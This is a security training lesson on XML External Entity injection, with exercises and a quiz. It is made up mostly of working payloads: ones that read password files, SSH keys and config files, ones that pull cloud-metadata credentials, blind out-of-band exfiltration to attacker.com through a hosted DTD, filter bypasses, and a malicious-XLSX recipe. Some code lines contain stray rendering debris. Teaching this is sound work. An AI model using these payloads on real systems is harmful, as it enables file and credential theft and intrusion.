XML External Entity (XXE) Injection

intermediate35 minWriteup

Exploiting XML parsers to read files and perform SSRF

Learning Objectives

  • Understand XXE vulnerabilities
  • Identify XXE attack vectors
  • Exploit XXE for file disclosure
  • Perform blind XXE attacks

XML: The Trojan Horse of Data Formats

XML was supposed to be a universal data exchange format. What could possibly go wrong with a language that lets you define your own tags? Well, it turns out XML has a feature called "external entities" that was designed for convenience but became one of the most dangerous vulnerability classes in web security.

XXE (XML External Entity) injection allows attackers to interfere with how an application processes XML data. At its mildest, you can read files from the server. At its worst, you get full server-side request forgery, port scanning, and even remote code execution.

XXE is often combined with . If you understand SSRF, you already know half of XXE exploitation!

XML Basics for Hackers

Before we break XML, let's understand what makes it tick. XML has a feature called DTD (Document Type Definition) that defines the structure of the document - and allows external entities.

Basic XML Structure

xml
1<?xml version=606070;">#a5d6ff;">"1.0" encoding="UTF-8"?>
2<user>
3 <name>John Doe</name>
4 <email>john@example.com</email>
5 <role>admin</role>
6</user>

Internal Entities (Safe-ish)

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE user [
3 <!ENTITY company 606070;">#a5d6ff;">"MegaCorp Inc">
4]>
5<user>
6 <name>John Doe</name>
7 <employer>&company;</employer> <!-- Expands to 606070;">#a5d6ff;">"MegaCorp Inc" -->
8</user>
9 
10<!-- Entities are like variables - define once, use many times -->

External Entities (Dangerous!)

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE user [
3 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
4]>
5<user>
6 <name>&xxe;</name> <!-- Server reads /etc/passwd into the name field! -->
7</user>
8 
9<!-- The SYSTEM keyword tells the XML parser to fetch external content -->
The DTD section (between <!DOCTYPE and >) is where XXE payloads live. If an application parses XML with external entity processing enabled, you can read files, make HTTP requests, and more.

Types of XXE Attacks

1. Classic XXE (File Disclosure)

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
4]>
5<data>&xxe;</data>
6 
7Response shows file contents:
8root:x:0:0:root:/root:/bin/bash
9daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
10...

2. XXE to SSRF

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE foo [
3 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"http://169.254.169.254/latest/meta-data/">
4]>
5<data>&xxe;</data>
6 
7<!-- Access AWS metadata, internal services, etc. -->
8<!-- Same techniques as SSRF! -->

3. Blind XXE (Out-of-Band)

When the XML response doesn't include your entity value, you need to exfiltrate data through out-of-band channels:

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE foo [
3 <!ENTITY % file SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
4 <!ENTITY % eval 606070;">#a5d6ff;">"<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
5 %eval;
6 %exfil;
7]>
8<data>test</data>
9 
10<!-- Server reads /etc/passwd, then makes request to attacker.com
11 with the file contents in the URL parameter -->

4. Error-Based XXE

xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE foo [
3 <!ENTITY % file SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
4 <!ENTITY % eval 606070;">#a5d6ff;">"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
5 %eval;
6 %error;
7]>
8 
9<!-- Forces an error that includes the file contents in the error message:
10 606070;">#a5d6ff;">"File not found: /nonexistent/root:x:0:0:root:/root:/bin/bash..." -->

5. XInclude Attacks

When you can't control the DOCTYPE but can inject into XML content:

xml
1<foo xmlns:xi=606070;">#a5d6ff;">"http://www.w3.org/2001/XInclude">
2 <xi:include parse=606070;">#a5d6ff;">"text" href="file:///etc/passwd"/>
3</foo>
4 
5<!-- XInclude is another way to include external content -->

Finding XXE Vulnerabilities

XXE Hunting Process

1
Identify XML Entry Points
  • File uploads (DOCX, XLSX, SVG are XML-based!)
  • API endpoints accepting XML
  • SOAP web services
  • RSS/Atom feed parsers
  • Config file uploads
2
Test for Entity Processing
  • Submit XML with a harmless internal entity
  • If it expands, external entities might work too
xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE test [<!ENTITY test 606070;">#a5d6ff;">"XXE_WORKS">]>
3<data>&test;</data>
4 
5If response contains 606070;">#a5d6ff;">"XXE_WORKS", entities are processed!
3
Test External Entity
  • Try file:// protocol to read local files
  • Try http:// to detect outbound connections
xml
1<?xml version=606070;">#a5d6ff;">"1.0"?>
2<!DOCTYPE test [
3 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/hostname">
4]>
5<data>&xxe;</data>
4
Try Blind XXE
  • If no direct output, use out-of-band detection
  • Host an external DTD on your server

Hidden XML Entry Points

1OBVIOUS:
2- Content-Type: application/xml
3- Content-Type: text/xml
4- API endpoints ending in .xml
5 
6HIDDEN (XML inside other formats):
7───────────────────────────────────
8DOCX/XLSX/PPTX (Office Open XML):
9- These are ZIP files containing XML!
10- Unzip, modify XML, re-zip
11- Upload the modified document
12 
13SVG (Scalable Vector Graphics):
14- SVG is XML-based
15- Image upload → SVG → XXE!
16 
17SOAP Web Services:
18- SOAP uses XML envelopes
19- Often poorly validated
20 
21PDF with XMP Metadata:
22- PDFs can contain XML metadata
23- Some parsers process external entities
24 
25RSS/Atom Feeds:
26- Feed readers parse XML
27- Inject XXE in your own feed
Try changing Content-Type from application/json to application/xml. Some APIs accept both formats but only secure one of them!

Exploitation Techniques

File Reading

xml
1<!-- Linux sensitive files -->
2<?xml version=606070;">#a5d6ff;">"1.0"?>
3<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">]>
4<data>&xxe;</data>
5 
6<?xml version=606070;">#a5d6ff;">"1.0"?>
7<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/shadow">]>
8 
9<?xml version=606070;">#a5d6ff;">"1.0"?>
10<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///home/user/.ssh/id_rsa">]>
11 
12<!-- Windows sensitive files -->
13<?xml version=606070;">#a5d6ff;">"1.0"?>
14<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///c:/windows/win.ini">]>
15 
16<?xml version=606070;">#a5d6ff;">"1.0"?>
17<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///c:/inetpub/wwwroot/web.config">]>
18 
19<!-- Application source code -->
20<?xml version=606070;">#a5d6ff;">"1.0"?>
21<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///var/www/html/config.php">]>
22 
23<?xml version=606070;">#a5d6ff;">"1.0"?>
24<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"php://filter/convert.base64-encode/resource=/var/www/html/config.php">]>

SSRF via XXE

xml
1<!-- Cloud Metadata -->
2<?xml version=606070;">#a5d6ff;">"1.0"?>
3<!DOCTYPE foo [
4 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"http://169.254.169.254/latest/meta-data/iam/security-credentials/">
5]>
6<data>&xxe;</data>
7 
8<!-- Internal Network Scanning -->
9<?xml version=606070;">#a5d6ff;">"1.0"?>
10<!DOCTYPE foo [
11 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"http://192.168.1.1:22/">
12]>
13<data>&xxe;</data>
14 
15<!-- Internal Services -->
16<?xml version=606070;">#a5d6ff;">"1.0"?>
17<!DOCTYPE foo [
18 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"http://localhost:8080/admin">
19]>
20<data>&xxe;</data>

Blind XXE with External DTD

1STEP 1: Host malicious DTD on your server (evil.dtd):
2──────────────────────────────────────────────────────
3<!ENTITY % file SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
4<!ENTITY % eval 606070;">#a5d6ff;">"<!ENTITY &#x25; exfil SYSTEM 'http://YOUR-SERVER/?data=%file;'>">
5%eval;
6%exfil;
7 
8STEP 2: XXE payload that loads your DTD:
9────────────────────────────────────────
10<?xml version=606070;">#a5d6ff;">"1.0"?>
11<!DOCTYPE foo [
12 <!ENTITY % xxe SYSTEM 606070;">#a5d6ff;">"http://YOUR-SERVER/evil.dtd">
13 %xxe;
14]>
15<data>anything</data>
16 
17STEP 3: Check your server logs for the callback with file contents!
18 
19NOTE: Parameter entities (%) are used because regular entities
20can't contain other entity definitions.

SVG XXE

xml
1<?xml version=606070;">#a5d6ff;">"1.0" standalone="yes"?>
2<!DOCTYPE svg [
3 <!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/hostname">
4]>
5<svg xmlns=606070;">#a5d6ff;">"http://www.w3.org/2000/svg" width="100" height="100">
6 <text x=606070;">#a5d6ff;">"0" y="20">&xxe;</text>
7</svg>
8 
9<!-- Upload this as profile picture, the file contents may appear in the image! -->

XLSX/DOCX XXE

bash
1606070;"># XLSX/DOCX files are ZIP archives containing XML
2 
3606070;"># Step 1: Create a legitimate document
4 
5606070;"># Step 2: Unzip it
6unzip document.xlsx -d extracted/
7 
8606070;"># Step 3: Find XML files to inject
9ls extracted/
10606070;"># xl/workbook.xml, xl/sharedStrings.xml, [Content_Types].xml
11 
12606070;"># Step 4: Inject XXE into one of the XML files
13606070;"># Add to the beginning of any XML file:
14<?xml version=606070;">#a5d6ff;">"1.0" encoding="UTF-8" standalone="yes"?>
15<!DOCTYPE foo [<!ENTITY xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">]>
16 
17606070;"># Step 5: Add &xxe; somewhere in the XML content
18 
19606070;"># Step 6: Re-zip
20cd extracted && zip -r ../malicious.xlsx * && cd ..
21 
22606070;"># Step 7: Upload malicious.xlsx

Bypassing XXE Protections

Encoding Bypasses

xml
1<!-- UTF-16 encoding -->
2<?xml version=606070;">#a5d6ff;">"1.0" encoding="UTF-16"?>
3 
4<!-- Different file:606070;">// variations -->
5file:606070;">///etc/passwd
6file:606070;">//localhost/etc/passwd
7file:606070;">//127.0.0.1/etc/passwd
8 
9<!-- PHP wrappers (if PHP parses the XML) -->
10php:606070;">//filter/convert.base64-encode/resource=/etc/passwd
11php:606070;">//filter/read=convert.base64-encode/resource=file:///etc/passwd
12 
13<!-- Expect wrapper (can execute commands!) -->
14expect:606070;">//whoami

Protocol Alternatives

xml
1<!-- If file:606070;">// is blocked -->
2 
3<!-- jar: protocol (Java) -->
4jar:http:606070;">//attacker.com/evil.jar!/file.txt
5 
6<!-- netdoc: protocol (Java) -->
7netdoc:606070;">///etc/passwd
8 
9<!-- gopher: protocol -->
10gopher:606070;">//attacker.com:1234/_test
11 
12<!-- data: protocol -->
13data:606070;">//text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk

Parameter Entities When Regular Blocked

xml
1<!-- Some parsers block regular entities but allow parameter entities -->
2 
3<?xml version=606070;">#a5d6ff;">"1.0"?>
4<!DOCTYPE foo [
5 <!ENTITY % xxe SYSTEM 606070;">#a5d6ff;">"file:///etc/passwd">
6 <!ENTITY % wrapper 606070;">#a5d6ff;">"<!ENTITY result '%xxe;'>">
7 %wrapper;
8]>
9<data>&result;</data>

Practice Challenges

Basic XXE

Challenge
🔥 medium

An API endpoint accepts XML: POST /api/parse Content-Type: application/xml <user> <name>John</name> <email>john@example.com</email> </user> The response echoes back: {"message": "User John (john@example.com) created"} Read the file /flag.txt from the server.

Need a hint? (3 available)

Blind XXE Exfiltration

Challenge
🔥 medium

Same endpoint, but now it only returns: {"status": "success"} The server blocks direct file:// responses but still processes external entities. You have a server at http://attacker.com that you control. Exfiltrate /etc/hostname from the target.

Need a hint? (4 available)

SVG Upload XXE

Challenge
🔥 medium

A website has a profile picture upload that accepts SVG files. The SVG is processed server-side and a PNG thumbnail is generated. When viewing thumbnails, you can see text rendered from the SVG. Exploit this to read /etc/passwd.

Need a hint? (3 available)

Knowledge Check

XXE Quiz
Question 1 of 5

What does DTD stand for in XML?

Key Takeaways

  • XXE exploits XML's external entity feature to read files, make HTTP requests (SSRF), and more
  • DTD section is the attack surface - look for <!DOCTYPE and <!ENTITY declarations
  • Hidden XML formats: DOCX, XLSX, SVG, SOAP, RSS/Atom are all potential XXE vectors
  • Blind XXE uses parameter entities and external DTDs to exfiltrate data out-of-band
  • Defense: Disable DTD processing and external entities in your XML parser configuration

Related Lessons